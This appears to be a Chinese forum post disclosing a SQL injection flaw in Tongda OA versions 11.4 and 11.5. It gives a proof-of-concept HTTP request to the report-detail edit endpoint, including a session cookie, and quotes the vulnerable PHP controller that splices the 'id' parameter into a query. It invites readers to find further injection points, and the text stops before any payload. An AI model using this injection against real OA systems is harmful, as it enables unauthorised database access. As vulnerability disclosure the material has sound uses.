通达OA11.5SQL注入漏洞¶
当时测试的版本是11.4。后来发现11.5也没有修复。其他版本未测试。
通达OA低版本存在多处SQL注入漏洞。很多地方都存在问题。我只发一个,剩下的坛友自己挖掘吧,也许有意想不到的结果。~
POC
GET /general/appbuilder/web/report/repdetail/edit?id=11&link_type=false&slot={} HTTP/1.1
Host: 192.168.1.11
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=42mi9cekm88g7ftbgllua7pl01; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=ef5494c8
Upgrade-Insecure-Requests: 1
需要一个可以登录系统的账号,普通权限即可。
general\appbuilder\modules\report\controllers\RepdetailController.php 函数 actionEdit()
public function actionEdit()
{
Yii::$app->response->format = yii\web\Response::FORMAT_JSON;
$_GET = modules\appdesign\models\AppUtils::toGBK($_GET);
$id = $_GET["id"];
$slot = $_GET["slot"];
$link_type = $_GET["link_type"];
$RepDetail = modules\report\models\RepDetail::find()->where("id=" . $id)->Asarray()->One();
注入参数:id
测试可以: